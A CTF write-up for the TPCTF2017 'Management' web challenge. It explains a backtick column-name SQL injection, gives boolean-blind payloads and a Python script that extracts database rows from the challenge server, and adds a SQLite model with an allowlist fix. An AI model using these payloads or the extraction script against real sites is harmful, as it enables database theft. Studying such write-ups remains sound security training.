[Web] TPCTF2017 - Management


Management
60

I’ve created a new website so you can do all your important management. It includes users, creating things, reading things, and… well, not much else. Maybe there’s a flag?

Second instance running at 52.90.229.46:8558

tpctf{san1t1z3_y0ur_1npu7s} is not the correct flag. Look harder ;)
Note: the flag format is flag{}, not the usual tpctf{}

Author: Kevin Higgs

Opening the website, we see that we can choose a user:

After doing this, a new form lets us read from or insert into the columns of the users table for the current user:

The page also shows the SQL query that is executed:

SELECT `1` FROM users WHERE name = 'custom-kevin';
Result: 1

It is shown right in the website. All inputs are sanitized except the POST parameter number, which is dropped into the backtick-quoted column name of the query (the `1` in SELECT `1`), so a value containing a backtick rewrites the select list. I used boolean-based blind SQL injection for this challenge; the base payload was:

1`=if((SELECT hex(substring('Abc',1,1)))=hex(substring('A',1,1)),`1`, 'False'), `1

The HEX function matters: under MySQL's default collation the string comparison is case-insensitive, so 'a' = 'A' is true and the recovered string would come back with the wrong case; comparing the hex-encoded bytes makes the test exact. What the page shows is the result of the comparison in the select list: when the condition is true, the query returns Result: 1, otherwise Result: 0. Doing this by hand is tedious, so I wrote a Python script to automate it:

import requests
import string

url = 'http://52.90.229.46:8558'

# Subquery templates: each returns the hex of the first i characters of a value
# from row j, which the payload compares against the hex of our guess.
TABLE_NAME = 'SELECT hex(substring(table_name,1,%d)) FROM information_schema.tables WHERE table_schema=database() limit %d,1'  # for enumerating tables, unused below
SUBSTRING_HEX_NAME = "hex(substring('{}',1,{}))"
USERS_NAME = 'SELECT hex(substring(name,1,%d)) FROM users limit %d,1'

cookie = {'user': 'kevin'}
for j in range(1, 5):            # rows 1..4 of users (row 0 is our own user)
    name = ''
    for i in range(1, 60 + 1):   # length of the prefix recovered so far + 1
        stop = True
        for l in string.printable:
            # The page prints "Result: 1" when the row's hex prefix equals the hex of
            # our guess and "Result: 0" otherwise. Note that ' and \ in string.printable
            # would break the quoted literal; the flag contains neither.
            PAYLOAD = "1`=if((%s)=%s,`1`, 'False'),`9" % (USERS_NAME % (i, j), SUBSTRING_HEX_NAME.format(name + l, i))
            r = requests.post(url, data={'number': PAYLOAD, 'action': 'Read', 'value': ''}, cookies=cookie, timeout=6)

            if 'Result: 1' in r.text:
                name += l
                print(name)
                stop = False
                break
        if stop:                 # no printable character matched: end of the string
            break
# Time-based alternative if the page stopped reflecting the result: if(1=1,sleep(6),0)
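The following is an added example and not code from the writeup or from the challenge. It reproduces the bug the page describes (the column name is pasted between backticks while the value is bound properly), drives the same boolean oracle, and recovers a string with a binary search over the character's code point, which needs 7 oracle queries per character for 7-bit ASCII instead of up to one query per candidate in string.printable (100 characters). It also shows the fix: identifiers cannot be bound as parameters, so the column name is checked against an allowlist. Assumptions that are not from the page: the backend is modelled with SQLite instead of MySQL, so CASE WHEN stands in for MySQL's IF() and unicode(substr()) for ASCII(SUBSTRING()); the users table, its column literally named `1`, and the secret row are constructed here; the content is assumed to be 7-bit ASCII.

```python
import sqlite3

# Constructed fixture (not from the challenge): a users table whose second
# column is literally named `1`, so the site's own query shape
# SELECT `1` FROM users WHERE name = '...' runs unchanged against it.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (name TEXT, `1` TEXT);
    INSERT INTO users VALUES ('custom-kevin', '1');
    INSERT INTO users VALUES ('flag{example_secret}', '1');
""")

stats = {"queries": 0}   # oracle requests issued by the last leak_string() call


def read_column_vulnerable(column, user):
    """Model of the challenge's bug: the column name is pasted between
    backticks unescaped, so a value containing a backtick rewrites the
    SELECT list. The WHERE value is bound correctly; the identifier is the hole."""
    query = "SELECT `" + column + "` FROM users WHERE name = ?"
    row = db.execute(query, (user,)).fetchone()
    return row[0] if row else None


def oracle(condition):
    """Boolean oracle in the shape of the writeup's payload. SQLite has no
    IF(), so CASE WHEN stands in for it: `1`=`1` yields 1 (the page's
    'Result: 1') and `1`='False' yields 0 ('Result: 0')."""
    stats["queries"] += 1
    payload = "1`=(CASE WHEN (" + condition + ") THEN `1` ELSE 'False' END), `1"
    return read_column_vulnerable(payload, "custom-kevin") == 1


def leak_char(position, row_index):
    """Recover one character of users.name by binary search on its code
    point: exactly 7 oracle queries for a 7-bit range instead of one per
    candidate character. Comparing code points (unicode() here, ASCII() or
    ORD() on MySQL) is numeric, so it is exact under a case-insensitive
    collation, the problem the writeup avoided with HEX(). Returns '' once
    the string is exhausted."""
    row = "(SELECT name FROM users ORDER BY rowid LIMIT 1 OFFSET %d)" % row_index
    if not oracle("length(%s) >= %d" % (row, position)):
        return ""
    code = "unicode(substr(%s, %d, 1))" % (row, position)
    lo, hi = 0, 127                      # assumption: 7-bit ASCII content
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("%s > %d" % (code, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def leak_string(row_index, max_len=64):
    """Dump one row's name character by character, like the writeup's loop."""
    stats["queries"] = 0
    out = ""
    for position in range(1, max_len + 1):
        ch = leak_char(position, row_index)
        if ch == "":
            break
        out += ch
    return out


ALLOWED_COLUMNS = {"name", "1"}


def column_is_allowed(column):
    """Identifiers cannot be bound as query parameters, so the fix is an
    allowlist of the column names the form is permitted to reference."""
    return column in ALLOWED_COLUMNS


def read_column_hardened(column, user):
    if not column_is_allowed(column):
        raise ValueError("unknown column: %r" % column)
    return read_column_vulnerable(column, user)   # safe once the identifier is vetted


if __name__ == "__main__":
    print(leak_string(1), "recovered in", stats["queries"], "oracle queries")
    try:
        read_column_hardened("1`=1, `1", "custom-kevin")
    except ValueError as exc:
        print("hardened endpoint rejected the payload:", exc)
```

Against the real target, oracle() would post the payload as the number parameter and test for "Result: 1" in the response, exactly as the script above does; only the condition string changes. Recovering the 20-character constructed secret costs 161 queries (8 per character including the length check, plus one terminating check), versus up to 100 per character with a linear scan.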

Running it

$ python management.py 
f
fl
fla
flag
flag{
flag{a
flag{aL
flag{aLW
flag{aLW4
flag{aLW4y
flag{aLW4ys
flag{aLW4ys_
flag{aLW4ys_E
flag{aLW4ys_ES
flag{aLW4ys_ESC
flag{aLW4ys_ESC4
flag{aLW4ys_ESC4P
flag{aLW4ys_ESC4PE
flag{aLW4ys_ESC4PE_
flag{aLW4ys_ESC4PE_3
flag{aLW4ys_ESC4PE_3v
flag{aLW4ys_ESC4PE_3v3
flag{aLW4ys_ESC4PE_3v3r
flag{aLW4ys_ESC4PE_3v3rY
flag{aLW4ys_ESC4PE_3v3rYT
flag{aLW4ys_ESC4PE_3v3rYTH
flag{aLW4ys_ESC4PE_3v3rYTH1
flag{aLW4ys_ESC4PE_3v3rYTH1N
flag{aLW4ys_ESC4PE_3v3rYTH1NG
flag{aLW4ys_ESC4PE_3v3rYTH1NG!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!
flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}